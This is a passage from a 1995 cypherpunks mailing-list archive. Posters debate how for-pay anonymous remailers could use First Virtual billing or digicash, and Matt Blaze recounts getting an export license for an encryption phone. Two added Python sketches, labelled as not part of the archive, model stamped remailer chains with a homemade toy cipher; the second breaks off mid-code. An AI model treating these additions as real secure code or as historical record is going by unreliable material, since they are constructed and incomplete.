include in that charge as many "hops" as you feel are necessary.  No
cheating involved -- the truly anonymous hops would only be accessible
from within the "system", i.e. from a similar anonymous remailer
"inside" the system or from one of the fee-for-entry systems.  If this
is the charging model, then the objections about knowing the chain
length, etc. all go away.

> 2) This system requires a good deal of cooperation and organization among
> remailer operators. 

Not that much, just a revenue sharing arrangement based on income and
volume.  Consortia do this sort of thing all the time, though most
consortia aren't formed in quite the atmosphere of paranoia that often
surrounds remailers.....

> Assuming that there will be some free as well as some charging remailers,
> I'd also like to use some of each in my chain.  I see some problems with
> the Remailer Trade Association allowing those transactions to happen.
> (will they accept incoming mail from a non-affiliated remailer, which surely
> won't be paying them at the end of the month?  Surely not, which means if I
> use any affiliated remailers in my chain, no affiliated remailers can come
> afterwards. So all affiliated remailers I'm using have to come before all
> non-affiliated remailers, which is an undesirable restriction which could
> aid traffic analysis. If there are several affiliations, things get even
> more complicated.)

Actually, I think this could be serialized -- you could design it so
that you could use free remailers either before or after the consortium
members, but once you left the consortium system your message would have
to somehow pay to get back in again.  That would be a mess, and not my
preferred way to do it.

> And it isn't an issue of
> certain sacrifices you have to make in order to set up for-pay remailers,
> as a Chaum digicash based for-pay remailer system would work admirably, and
> none of my objections would apply to it.

Yes, it is true that if digicash starts working for real money, it
will answer your objections quite nicely.  However, there are lots of
objections to that sort of system, too, they're just different ones.  As
both the FV and Digicash folks have pointed out many times, we have very
different technologies that fill very different requirements, it's not
an either/or choice.  I think you could build interesting anonymous
remailers on each system, too.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonny Goldman <jonny@Synopsys.COM>
Date: Fri, 6 Jan 95 16:19:51 PST
To: tengi@Princeton.EDU
Subject: Indexing and searching (was Re: public vs. private replies)
In-Reply-To: <9501062315.AA29835@deepthought.Princeton.EDU>
Message-ID: <9501070020.AA01782@philo.synopsys.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 06 Jan 1995 18:15:40 EST
   From: "Christopher J. Tengi" <tengi@Princeton.EDU>

   You may want to take a look at glimpse and harvest.  Here are some useful URLs 
   for them:

   http://glimpse.cs.arizona.edu:1994/

   http://harvest.cs.colorado.edu/

Both very good systems.  Harvest is probably overkill.  Glimpse is nice,
but I don't know if it handles mail archives (unless they are
one-file-per-message).

   > 
   > In article <199501060807.DAA22166@bb.hks.net>,
   > L. McCarthy <lmccarth@ducie.cs.umass.edu> wrote:
   > >Tim May writes:
   > >> In my opinion, having personal access
   > >> to past posts is several orders of magnitude more important than
   > >> having MIDI-MIME JPEG-II TeX players [...]
   > >
   > >It takes more disk space from one's personal quota, though (for those who
   > >suffer under such restrictions). :[
   > 
   > All posts to cypherpunks since June '94 are available by ftp from
   > ftp.hks.net:/cypherpunks/nntp/cypherpunks.   They are also available
   > via nntp from nntp.hks.net:hks.lists.cypherpunks.
   > 
   > I'd be glad to put a search engine of some sort on them, either by
   > Web or by mailserver, if someone can suggest a reasonable way to index
   > the whole lot.

There used to be a WAIS index of cypherpunks on mariposa, but it doesn't
seem to work now.

WAIS indexing mail archives is pretty easy.

- Jonny G




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 6 Jan 95 13:30:13 PST
To: Nathaniel Borenstein <nelson@crynwr.com
Subject: for-pay remailers and FV (Was Re: Remailer Abuse)
Message-ID: <ab336511060210049dfa@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:10 PM 01/06/95, Nathaniel Borenstein wrote:
>I hate to say it, because I generally tend to take the pro-FV side of
>most arguments :-), but I think Jonathan's closer to the mark in this
>case.  If mail goes through ten remailers, and they ALL charge via First
>Virtual, then the last one in the chain won't have to know who you are,
>but it will have to know your FV billing account.  Thus it, together
>with FV, have enough information to break anonymity.
>
>This is NOT the same as saying that ANY one operator, together with FV,
>can burst anonymity; it means that the last one + FV can do so.  I

Hmm. Maybe I don't completely understand how this is going to work, but
won't _every_ remailer in the chain need to know your FV billing account?
How would the rest of them charge via FV without knowing your billing
account?  What Russell was suggesting (I think), was that only the first
would bill via FV directly, so only the first would need to know your
billing account, and then he'd settle up with the others at the end of the
month. (A particular variation of that scheme is what you mentioned later
in your message, and I'll get to that).

But assuming that every remailer along the chain _was_ charging via FV, I
fail to see how only the last one would need your billing account; seems to
me they all would, and thus any one could collude with FV to violate your
anonymity.

[...]
>Personally, for my taste this is sufficiently anonymous for any
>reasonable purpose.  HOWEVER, I can imagine how to make it even more
>anonymous.  Imagine that there are ten for-profit anonymous remailer
>operators who form an "anonymous remailers consortium".  Each of them
>operates TWO remailers, a for-pay one and a free one, but the free one
>will only take things that have come directly via some consortium
>member's anonymous remailer, so your message has to be paid for once, at
>the entry point to the overall system.    Now you can build up a chain
>that STARTS with a payment, but then threads its way through a bunch of
>less traceable systems, where the operators can't give tracing
>information even under court order.  The consortium members would
>probably have to agree to some revenue sharing arrangements, but you
>could make this work.

Yeah, that's a specific instance of the type of thing Russell was proposing
in the message you were replying to. An instance which avoids many of the
criticisms I made directly after Russell's message, but not all. The
remailer operators still have to have an organization and remain in close
contact, which I am uncomfortable with because it seems to make collusion
more likely. And it's still difficult to intermix for-pay and free remailers
within your chain, or even just for-pay remailers from several different
consortiums. And there are a variety of problems in that inability.   [The
consortium, as far as I can tell, would also find it rather difficult to
charge more for a longer chain, I can't think of any way for them to charge
anything except a uniform amount regardless of length of chain, unless you
give the first remailer a way to tell the length of your chain, which is
undesirable. I'm not sure if this is a problem.]

>I think this level of engineering is overkill -- for my personal level
>of paranoia, I would settle for a single for-pay anonymous remailer
>located in a country with very different laws than those that governed
>the payment system.    Such a system would probably be "breakable" for

And this level of paranoia would be perfectly well served by a Julf/penet
style remailer, which _would_ work well with an FV-payment system, as I
agreed before.  The cypherpunks chained remailernet system as a whole is
overkill for your paranoia needs, but apparently not for the needs of
those who use it over Julf's.  It appears to me, that an FV-style payment
scheme can't be added to the cypherpunks chained remailer system without
dropping its security to the level of Julf's.  Which might be good enough
for you, but not good enough for me, or presumably for anyone else that
uses cypherpunks remailers.

[Do you understand how cypherpunks remailers work, and the difference
between them and a julf/penet style remailer?   Do you understand how
encryption is used in a cypherpunks-style remailer chain to make it so each
individual remailer only knows the next remailer along the chain, and not
the entire rest of the chain?]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 6 Jan 95 13:44:48 PST
To: Nathaniel Borenstein <cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <ab33683b080210045c1e@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:20 PM 01/06/95, Nathaniel Borenstein wrote:
>Yes, it is true that if digicash starts working for real money, it
>will answer your objections quite nicely.  However, there are lots of
>objections to that sort of system, too, they're just different ones.  As
>both the FV and Digicash folks have pointed out many times, we have very
>different technologies that fill very different requirements, it's not
>an either/or choice.  I think you could build interesting anonymous
>remailers on each system, too.  -- Nathaniel

Try to bring up objections to a digicash-style system that are applicable
to remailers.   I agree that they are different technologies that fill
different requirements, but it seems to me that the particular requirements
of a remailer system are only met by a digicash/magic money style
technology.

 I think  an electronic cash system that will work with remailers, must
satisfy these things:
1) You need to be able to enclose the "signifier" of the transaction inside
encryption.  Whether the "signifier" is the cash itself, or an agreement to
make a transaction together with a billing number, or whatever, you need to
be able to enclose it in a PGP (or other arbitrary PKE protocol) encrypted
block.
2) The "signifier" of the transaction (which again might theoretically be
the cash itself, or some kind of billing number) alone shouldn't be enough
to reveal the identity of the anonymous user.

Number two up there is what most of us _mean_ by "anonymous digital cash",
and FV simply doesn't meet it. FV might be perfectly adequate in some
circumstances, but it doesn't meet that requirement, and many of us aren't
going to feel comfortable using a system to pay for remailer access (among
other things, certainly, but remailer access is something that is worthless
without anonymity) that doesn't fulfill that requirement.  If the
"signifier" alone can be used to determine who I am, even if it takes the
collusion of FV and a remailer op, I'm not comfortable with that.  Number
One is necessary for the ecash protocol to work within the remailer
framework effectively; I've got to send each remailer its payment within
an "envelope" that no one else can penetrate.

The use of an ecash payment system which doesn't meet these two
requirements can't help but _lessen_ the security of the current
conglomeration of remailers. Which is unacceptable to me.  Remailers should
be trying to approach the goal of ensured secure anonymity, and requiring
payment by an ecash system which doesn't meet those two requirements would
seem to be retreating from that goal, in a rather difficult to reverse
manner.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Fri, 6 Jan 95 13:56:39 PST
To: cypherpunks@toad.com
Subject: My life as an international arms courier
Message-ID: <9501062154.AA04543@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Under an obscure provision of US law, devices and computer programs
that use encryption techniques to hide information from prying eyes
and ears are considered ``munitions'' and subject to the same rules
that govern the international arms trade.  In particular, taking such
items out of this country requires the approval of the State
Department, which decides whether exporting something might endanger
national security.  In the past, these restrictions were of little
concern to the average citizen; encryption found most of its
application in military and diplomatic communications equipment.
Today, however, growing concern over electronic fraud and privacy
means that encryption techniques are starting to find their way into
more conventional commercial products like laptop computers and
portable phones.

Mostly to find out what the process was like, I recently applied for a
temporary export license for a portable telephone encryption product
that I wanted to take with me on a business trip to England and
Belgium.

The item in question is more properly called a ``telephone security
device.''  This is a little box that scrambles telephone conversations
to protect them against eavesdroppers; this sort of protection is
sometimes important when discussing confidential business matters from
faraway places.  The particular model I bought was already approved
for export; it employs a cipher algorithm that the government has
already decided is not a threat to national security even should it
fall into the hands of some rogue government.  This model is aimed
primarily, I presume, at international business travelers who want to
communicate in a reasonably secure manner with their home offices in
the states.  In other words, a typical user buys two of them, leaving
one at the home office and carrying the other when traveling abroad.
The options that came with my device included a James Bond-ish looking
acoustic coupler and handset to facilitate its connection to the
hardwired phones that are still common in European hotel rooms.

It turns out that there was recently some discussion in the government
about exempting products like my secure phone from the licensing
paperwork requirements.  Unfortunately, however, this exemption never
actually took effect.  So even though the device I had was already
approved for sale abroad, I still needed to get a temporary export
license before I could take it with me.  But I was assured that ``this
is an easy, routine process''.  Well, sure enough, about two weeks
before I was to leave I got back my official US State Department
``license for the temporary export of unclassified defense articles''.
So far, so good.

From what I was able to figure out by reading the license (and having
a few conversations with an export lawyer), I'm required to leave from
an international airport with a Customs agent present (no problem
there, although Customs is geared to arriving, rather than departing,
travelers).  At the airport, I'm supposed to fill out a form called a
``shipper's export declaration'' (SED) on which I have to declare that
``these commodities are authorized by the US government for export
only to Belgium and the United Kingdom.  They may not be resold,
transshipped, or otherwise disposed of in any country, either in their
original form or incorporated into other end-items without the prior
written approval of the US Department of State''.  Then I'm to present
the SED and export license to a Customs official at the airport before
I leave.  The Customs officer is supposed to take my SED and endorse
my license to show what I'm actually taking out of the country.

On the way back in, I'm supposed to ``declare'' my item at Customs
(even though it was manufactured in the US) and show them my license,
and they're supposed to endorse the license again as proof that I
have, in fact, returned the ``defense article'' to the safety of the
United States.

The first hitch I ran into was that no one could actually tell me
where I could get an SED form.  But when I called Customs they assured
me that this was no big deal.  ``Just come by when you get to the
airport and we stamp the license.  I guess you can just fill out the
SED there,'' they said.

I made sure to get to the airport early anyway.

Although there was moderately heavy traffic near the airport, I made
it to JFK two and a half hours before my 10pm flight.  I was flying
United, which has their own terminal at JFK, so Customs has an office
right there in the same building from which I was to depart (JFK is
awful to get around, so I was glad for this).  I checked in for my
flight (and got upgraded to first class, which bolstered my
expectation that everything was going to be really easy from here on).
Then, luggage, license and phone in hand, I made my way downstairs to
Customs, expecting to fill out the SED form and ``just have my license
stamped'' as they had assured me earlier on the telephone.  I
explained my situation to the security guard who controls entry to the
Customs area, and he led me to ``the back office'' without much
argument or delay.  The head uniformed Customs guy in the back office
(which I think is the same office where they take the people suspected of
being ``drug mules'' with cocaine-filled condoms in their stomachs)
looked approachable enough.  He had a sort of kindly, grandfatherly
manner, and he was playing a video game on a laptop computer.  I got
the impression that most of the people he encounters are suspected
drug smugglers, and he seemed pleased enough to be dealing with
something a little different from the norm.  When I explained what I
was doing he looked at me as if I had just announced that I was a
citizen of Mars who hadn't even bothered to obtain a visa.

He explained, carefully, that a) I really do need the SED form; b) not
only that, I should have already filled it out, in duplicate; c) he
doesn't have blank SED forms; d) he, like everyone else in the entire
US government that I had spoken to, has no idea where one gets them
from, but people must get them from somewhere; and e) it doesn't
really matter, because I'm in the wrong place anyway.

I asked him where the right place is.  ``The cargo building, of
course,'' he told me, patiently.  I remembered the cargo building
because I passed it in the taxi just as the traffic jam began, about
half an hour before I got to the United terminal.  The airport shuttle
bus doesn't stop there.  I'd have to call a taxi.  ``But I think
they're closed now, and even if they were open you'd never make it
before your flight'' he helpfully added, saving me the trip.  He also
complimented me for going to the trouble to get the license.

I must have looked hurt and confused.  Eventually he called in some
fellow in a suit who I presume to have been his boss.

``Are you the guy who wants to export the fancy gun?'' the fellow in
the suit asked me.

``It's not a gun, it's a telephone,'' I responded, with a straight
face.

``Why do you have a license to export a telephone?''  Good question, I
thought.  I explained about the export law and showed him the thing.
He agreed that it looked pretty harmless.

The fellow in the suit reiterated points a through e almost verbatim
(do they rehearse for these things?) and explained that this isn't
really their department, since my license was issued by the State
Department, not Customs, and my situation doesn't come up very often
because exports usually go via the cargo building.  He'd love to help
me, but the computer in which these things get entered is over in
Cargo.  ``That's how the records get made.  But you do have a valid
license, which is nice.''  He also suggested that I would have had an
easier time had I shipped the device instead of carrying it with me.

I asked what I should do, given that my plane was scheduled to leave
in less than an hour.  Neither was sure, but the fellow in the suit
seemed willing to leave it to the discretion of the uniformed guy.  ``How
does this thing work, anyway?'' he asked.  I explained as best as I
could, trying to make it sound as harmless as it is.  ``You mean like
that Clipper chip?'' he asked.

At this point, given that he has a computer and knows something about
the Clipper chip, I figured that maybe there was some hope of making
my flight.  Or maybe I was about to spend the night in jail.  In my
mind, I put it at about a 90:10 hope:jail ratio.

Then he asked, ``Do you know about this stuff?''

So we chatted about computers and cryptography for a while.  Finally,
the two of them decided that it wouldn't really hurt for them to just
sign the form as long as I promised to call my lawyer and get the SED
situation straightened out ASAP.  They assured me that I won't be
arrested or have any other trouble upon my return.

I made my flight, validated license in hand.

An aside: Throughout my trip, I discovered an interesting thing about
the phone and the various options I was carrying with it.  Under X-ray
examination, it looks just like some kind of bomb.  (I suspect it was
the coiled handset cords).  Every time I went through a security
checkpoint, I had to dig the thing out of my luggage and show it to
the guard.  I almost missed the new ``Eurostar'' chunnel train (3hrs
15mins nonstop from London to Brussels, airport-style checkin and
security) as the guards were trying to figure out whether my telephone
was likely to explode.

Coming back to the US was less eventful, though it did take me an
extra hour or so to get through Customs.  Expecting a bit of a hassle
I didn't check any luggage and made sure to be the first person from
my flight to reach the Customs line.  The inspector was ready to
wordlessly accept my declaration form and send me on my way when I
opened my mouth and explained that I needed to get an export license
stamped.  That was obviously a new one for him.  He finally decided
that this had to be handled by something called the ``Ships Office''.
I was sent to an unoccupied back room (a different back room from
before) and told to wait.  I thought about the recent Customs
experiences of Phil Zimmermann.  (Zimmermann, the author of a popular
computer encryption program, was recently detained, questioned and
searched by Customs officials investigating whether he violated the
same regulations I was trying so hard to follow.)  After about half an
hour, an officer came in and asked me what I needed.  I explained
about my export license that had to be endorsed.  She just shrugged
and told me that she had to ``process the flight'' first.  As best as
I could tell, her job was to clear the airplane itself through
Customs, that being, technically speaking, a very expensive import.
It would take a little while.  She was pleasant enough, though, and at
least didn't look at me as if she intended to send me to jail or have
me strip searched.

Finally, she finished with the plane and asked me for my form.  She
studied it carefully, obviously never having seen one before, and
eventually asked me what, exactly, she was supposed to do.  I
explained that I had never actually gone through this process before
but I understood that she's supposed to record the fact that I was
re-importing the device and stamp my license somewhere.  She told me
that she didn't know of any place for her to record this.  After some
discussion, we agreed that the best thing to do was to make a Xerox
copy of my license and arrange for it to go wherever it had to go
later.  She stamped the back of the license and sent me on my way.  It
was a little over an hour after I first reached the Customs desk.

My conclusion from all this is that it just isn't possible for an
individual traveler to follow all the rules.  Even having gone through
the process now, I still have no idea how to obtain, let alone file,
the proper forms, even for a device that's already been determined to
be exportable.  The export of export-controlled items is ordinarily
handled by cargo shipment, not by hand carrying by travelers, and the
system is simply not geared to deal with exceptions.  Technically
speaking, everyone with a laptop disk encryption program who travels
abroad is in violation of the law, but since no one actually knows or
checks, no mechanism exists to deal with those who want to follow the
rules.  While (fortunately) everyone I dealt with was sympathetic, no
one in the government who I spoke with was able to actually help me
follow the rules.  I was permitted to leave and come back only because
everyone involved eventually recognized that my telephone was pretty
harmless, that my intentions were good, and that the best thing to do
was be flexible.  If anyone had taken a hard line and tried to enforce
the letter of the law, I simply wouldn't have been able to take the
thing with me, even with my license.  Had I just put my telephone in
my suitcase without telling anyone instead of calling attention to
myself by trying to follow the rules, chances are no one would have
noticed or cared.

Unfortunately, however, these absurd rules carry the full force of
law, and one ignores them only at the risk of being prosecuted for
international arms trafficking.  While it may seem far-fetched to
imagine US citizens prosecuted as arms smugglers simply for carrying
ordinary business products in their luggage, the law as written allows
the government to do just that.  At the same time, anyone who is aware
of and who tries to follow the regulations is made to jump through
pointless hoops that are so obscure that even the people charged with
enforcing them don't know quite what to make of them.

Copyright 1995 by Matt Blaze. All rights reserved.

Electronic redistribution permitted provided this article is reproduced
in its entirety.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@python.ee.unr.edu>
Date: Fri, 6 Jan 95 14:12:05 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <199501062217.RAA29043@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> >Why?  Why wouldn't the FV remailers use settlements?  At the end of
> >the month, everyone settles accounts in re who gets what fraction of
> >what.  No logs are needed other than counters.

> Oh, you're suggesting that I'd only actually pay the first remailer on my
> chain, and at the end of the month he'd pay some of the money I (and
> others) paid him to all of the other remailers he's transacted with over the
> month? 

Way too complicated . . .

Why not establish a system where only the first remailer is paid and
all subsequent remailers agree to accept traffic from other remailers
without compensation? Assuming that first remailer use is or would be
somewhat distributed, the net from each remailer would approach the same
figure reached by endlessly confusing cross-payments (A pays B, C, and D,
B pays A, C, and D, etc.). Only non-remailed access would be subject to
a fee.

Operators with the best net. reputations and those whose remailers are 
especially full featured or prompt will likely receive more use as
"entry" remailers; this is good capitalism which should not only increase
their number but improve the state of remailers in general. If someone
wants to establish a remailer that will join the existing mesh of remailers,
it will have to accept messages from others gratis if it wants such access
to the rest of them. Its compensation would be derived from initial traffic.

Maybe this would also encourage operators to beat the bushes for traffic,
which would also be a Good Thing.


=D.C. Williams	<dcwill@ee.unr.edu>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw3BayoZzwIn1bdtAQECegGAjSdkX8YYygLJkk1K/Sr6A84QpdNOXbUq
uuWxqbSg+6T3Tac+GKdxdNw2SqdExIrV
=z/ms
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Fri, 6 Jan 95 18:07:47 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: Remailer Abuse
In-Reply-To: <ab33592305021004d062@[132.162.201.201]>
Message-ID: <950106.173231.9X3.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, jrochkin@cs.oberlin.edu writes:

> At 3:12 PM 01/06/95, Russell Nelson wrote:

>>Why?  Why wouldn't the FV remailers use settlements?  At the end of
>>the month, everyone settles accounts in re who gets what fraction of
>>what.  No logs are needed other than counters.
> 
> Oh, you're suggesting that I'd only actually pay the first remailer on my
> chain, and at the end of the month he'd pay some of the money I (and
> others) paid him to all of the other remailers he's transacted with over the
> month?  I hadn't thought of that, but now that I do, I can see several
> problems arising.

This might not be as much of a problem as you think.  Given that there
will likely be a mixture of free and pay remailers, and that a given
message may chain through one or more of either type, why not place the
stamp for each pay remailer inside the encrypted sub-packet which that
mailer will receive?

Think of each remailer as an independent post office.  For each pay
remailer, you need one stamp.  Ideally, each stamp would be a bit less
expensive, but since remailers don't need to share their revenue, that
shouldn't be much problem.  An intelligent chainer (Chain++, maybe?)
could keep track of your postage and put the stamps in the proper inner
envelopes.

This would work best if all the pay remailers accepted a common brand of
stamp.
- -- 
       Roy M. Silvernail         [ ]  roy@cybrspc.mn.org
                    PGP public key available by mail
     echo /get /pub/pubkey.asc | mail file-request@cybrspc.mn.org
         These are, of course, my opinions (and my machines)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLw3VrBvikii9febJAQFozwQAkYUBp9Uc5Lbmc4udL7hwTgBY9I+yfKdy
wvW5xl4TeTeJLAS95yHOyiEKP/nVsjfknr4gx1mOrFZYOxkNRJa78YeQ8tDAVq7Y
S1UQrYqHJAoi/AKdypufIaeu8iF/1pVbYLDdIbbQm3bxlUZHwciYJUvnneRjFbhA
BJB+ruqzEMs=
=CGFS
-----END PGP SIGNATURE-----
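
[Added example, not part of the archived messages: a sketch of the "stamp in each inner envelope" idea from the message above, which is also requirement 1 of the earlier message about what an ecash system for remailers must satisfy. The names StampBank, Remailer, build_chain and deliver are hypothetical, and seal()/unseal() are a symmetric stand-in for PGP public-key encryption. Stamps are random bearer serials with no account field; issuer-side blinding in the style of Chaum's digicash is not modelled.]

```python
import hashlib
import hmac
import json
import os


def keystream(key, nonce, length):
    """HMAC-SHA256 in counter mode, used here as a toy stream cipher."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def seal(key, plaintext):
    """Stand-in for 'PGP-encrypt to this remailer' (encrypt-then-MAC)."""
    nonce = os.urandom(16)
    enc_key = hashlib.sha256(b"enc" + key).digest()
    mac_key = hashlib.sha256(b"mac" + key).digest()
    ct = bytes(p ^ s for p, s in zip(plaintext, keystream(enc_key, nonce, len(plaintext))))
    return nonce + ct + hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()


def unseal(key, blob):
    """Open an envelope; fails if it was sealed for a different remailer."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    enc_key = hashlib.sha256(b"enc" + key).digest()
    mac_key = hashlib.sha256(b"mac" + key).digest()
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("envelope was not sealed for this remailer")
    return bytes(c ^ s for c, s in zip(ct, keystream(enc_key, nonce, len(ct))))


class StampBank:
    """Hypothetical issuer of one 'common brand of stamp'."""

    def __init__(self):
        self.unspent = set()

    def issue(self):
        serial = os.urandom(16).hex()  # bearer token: no account or name inside
        self.unspent.add(serial)
        return serial

    def redeem(self, serial):
        """Each stamp pays for exactly one hop, once."""
        if serial not in self.unspent:
            return False
        self.unspent.remove(serial)
        return True


class Remailer:
    def __init__(self, name, bank, charges):
        self.name, self.bank, self.charges = name, bank, charges
        self.key = os.urandom(32)  # stand-in for this remailer's PGP key pair
        self.log = []              # everything this operator ever learns

    def process(self, blob):
        layer = json.loads(unseal(self.key, blob))
        stamp = layer.get("stamp")
        if self.charges and not (stamp and self.bank.redeem(stamp)):
            raise PermissionError(self.name + ": missing or already-spent stamp")
        self.log.append({"next": layer["next"], "stamp": stamp})
        return layer["next"], bytes.fromhex(layer["payload"])


def build_chain(route, recipient, message, bank):
    """Wrap from the innermost hop outward; each pay hop gets its own stamp."""
    next_hop, payload = recipient, message.encode()
    for remailer in reversed(route):
        layer = {"next": next_hop, "payload": payload.hex()}
        if remailer.charges:
            layer["stamp"] = bank.issue()
        payload = seal(remailer.key, json.dumps(layer).encode())
        next_hop = remailer.name
    return next_hop, payload


def deliver(network, first_hop, blob):
    """Pass the packet hop to hop until it leaves the remailer network."""
    hop, hops = first_hop, []
    while hop in network:
        hops.append(hop)
        hop, blob = network[hop].process(blob)
    return hop, blob.decode(), hops


if __name__ == "__main__":
    bank = StampBank()
    route = [Remailer("pay-a", bank, True), Remailer("free-b", bank, False),
             Remailer("pay-c", bank, True)]
    first, packet = build_chain(route, "rcpt@example.org", "constructed test message", bank)
    print(deliver({r.name: r for r in route}, first, packet))
    for r in route:
        print(r.name, "learned only:", r.log)
```

Free and pay remailers can be interleaved in any order because each hop checks only the stamp inside its own layer, and the first hop never learns the chain length.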





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 6 Jan 95 14:45:49 PST
To: jrochkin@cs.oberlin.edu
Subject: Re: for-pay remailers and FV (Was Re: Remailer Abuse)
In-Reply-To: <2292.789427808.1@nsb.fv.com>
Message-ID: <wj3QKlz0Eyt5AxIAJg@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from fv: 6-Jan-95 for-pay remailers and FV (W..
jrochkin@cs.oberlin.edu (4416*)

> Hmm. Maybe I don't completely understand how this is going to work, but
> won't _every_ remailer in the chain need to know your FV billing account?
> How would the rest of them charge via FV without knowing your billing
> account?  What Russell was suggesting (I think), was that only the first
> would bill via FV directly, so only the first would need to know your
> billing account, and then he'd settle up with the others at the end of the
> month. (A particular variation of that scheme is what you mentioned later
> in your message, and I'll get to that).

The latter is what I was proposing.  Only the first one would charge via
FV, but the other ones would form a "closed system" that you could only
get into by going through one that charged.

> But assuming that every remailer along the chain _was_ charging via FV, I
> fail to see how only the last one would need your billing account; seems to
> me they all would, and thus any one could collude with FV to violate your
> anonymity.

That's not my assumption.  I think you may have misread my mail -- I
*agree* with you on this point.  Sorry if I was unclear!

> The
> remailer operators still have to have an organization and remain in close
> contact, which I am uncomfortable with because it seems to make collusion
> more likely. 

As I said, it all depends on your level of paranoia....  I tend to think
that in such an organization, where the primary "product" is privacy,
each member would tend to watch all the other members like hawks, eager
to publicize any instance of the other guy not being sufficiently
zealous in protecting privacy.  (Of course, I'm assuming that people
like *you* will be running these services, i.e. people even more
paranoid about privacy than me.)

> And it's still difficult to intermix for-pay and free remailers
> within your chain, or even just for-pay remailers from several different
> consortiums. 

I think this is wrong.  In my model, each consortium model has two, a
for-pay and a for-free.  Anyone can send to a for-pay, but only a
consortium remailer can send to a for-free.  Not that complicated,
really.

>  [The
> consortium, as far as I can tell, would also find it rather difficult to
> charge more for a longer chain, I can't think of any way for them to charge
> anything except a uniform amount regardless of length of chain, unless you
> give the first remailer a way to tell the length of your chain, which is
> undesirable. I'm not sure if this is a problem.]

To my mind, that's not a bug, it's a feature.  The consortium is
charging you a set fee for privacy, and you get to decide how many hops
are required to have a level of privacy you trust.

> And this level of paranoia would be perfectly well served by a Julf/penet
> style remailer, which _would_ work well with an FV-payment system, as I
> agreed before.  The cypherpunks chained remailernet system as a whole is
> overkill for your paranoia needs, but apparently not for the needs of
> those who use it over Julf's.  It appears to me, that an FV-style payment
> scheme can't be added to the cypherpunks chained remailer system without
> dropping its security to the level of Julf's.  Which might be good enough
> for you, but not good enough for me, or presumably for anyone else that
> uses cypherpunks remailers.

This is true of the scheme that I said I would be satisfied with (one
remailer + FV), but not true, I think, of the "overkill" scheme, which
was the consortium.

> [Do you understand how cypherpunks remailers work, and the difference
> between them and a julf/penet style remailer?   Do you understand how
> encryption is used in a cypherpunks-style remailer chain to make it so each
> individual remailer only knows the next remailer along the chain, and not
> the entire rest of the chain?]

Well, I *think* I do, though I may be suffering from a bit of
dilettantism here -- I'm certainly no expert in cryptography, but I
think I understand the concepts involved.  We haven't even gotten into
the effect of encryption yet -- so far, we've just been talking, I
thought, about untraceability.  But as far as I can see, there's no
reason that the consortium pay-only-at-entry scheme couldn't work with
encrypted remailers.  Am I confused?  Couldn't you use the same
cryptographic chain as is currently used, where all the inner entries in
the chain are free crypto-remailers open only to other consortium
remailers, but in which the outer encrypted message had the FV payment
attached, which gained it entry to the remailer pool?

> Try to bring up objections to a digicash-style system that are applicable
> to remailers.   I agree that they are different technologies that fill
> different requirements, but it seems to me that the particular requirements
> of a remailer system are only met by a digicash/magic money style
> technology.

Again, I think you mis-read me.  I haven't (nor do I care to) spent a
lot of time thinking about how to do remailers at all, let alone with
digicash.  What I was referring to was the basic objections that come
from using a digital cash scheme in the first place.

>  I think  an electronic cash system that will work with remailers, must
> satisfy these things:
> 1) You need to be able to enclose the "signifier" of the transaction inside
> encryption.  Whether the "signifier" is the cash itself, or an agreement to
> make a transaction together with a billing number, or whatever, you need to
> be able to enclose it in a PGP (or other arbitrary PKE protocol) encrypted
> block.
> 2) The "signifier" of the transaction (which again might theoretically be
> the cash itself, or some kind of billing number) alone shouldn't be enough
> to reveal the identity of the anonymous user.

I agree that FV doesn't meet the above requirements, but I don't see why
they're necessary for remailers.  In the consortium scheme I'd proposed,
the only thing that could ever be proven about you would be that you had
used a remailer.  Now, if the message was not encrypted, your anonymity
could be broken by collusion of FV and the "entry" remailer.  But if the
cypherpunks style cryptographic chain was used, i.e. if the contents
(including an inner envelope that said who you really sent it to) were
encrypted, nothing more would ever be derivable without the collusion of
everyone in the chain, and even then it would only be derivable if
certain records were kept.  

All I'm claiming is that it's do-able using the FV payment system.  I'm
not going to do it myself because I don't personally feel that this
level of untraceability is EVER legitimately necessary.....  -- Nathaniel
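
The pay-only-at-entry consortium argued for in this message, as an added example that is not part of the original post. A toy keyed stream cipher stands in for PGP encryption to each remailer's key, and the remailer names, the FV account string and the recipient are constructed; it records what each operator could log.

```python
import hashlib
import hmac
import json
import secrets


def _keys(key: bytes):
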